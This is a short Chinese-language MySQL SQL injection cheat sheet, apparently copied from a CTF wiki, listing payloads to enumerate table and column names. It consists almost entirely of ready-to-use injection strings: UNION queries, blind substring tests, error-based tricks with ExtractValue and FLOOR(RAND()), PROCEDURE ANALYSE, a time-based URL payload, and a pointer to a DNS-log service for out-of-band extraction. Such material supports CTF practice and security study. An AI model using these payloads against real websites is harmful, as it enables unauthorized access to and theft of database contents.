原網址 : https://wiki.x10sec.org/web/sqli-zh/
表名 ¶
-
union 查詢
--MySQL 4版本時用version=9,MySQL 5版本時用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出當前數據庫中的表 */ UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* 列出所有用戶自定義數據庫中的表 */ SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql'; -
盲注
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' -
報錯
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1))); -- 在5.1.5版本中成功。列名 ¶
-
union 查詢
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' -
盲注
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' -
報錯
-- 在5.1.5版本中成功 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1) -- MySQL 5.1版本修復了 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1))); -
利用
PROCEDURE ANALYSE()-- 這個需要 web 展示頁面有你所注入查詢的一個字段 -- 獲得第一個段名 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() -- 獲得第二個段名 1 LIMIT 1,1 PROCEDURE ANALYSE() -- 獲得第三個段名 1 LIMIT 2,1 PROCEDURE ANALYSE()
不讓你用 “
BENCHMARK 判斷執行時間
http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
dnslog 平台:http://ceye.io/
-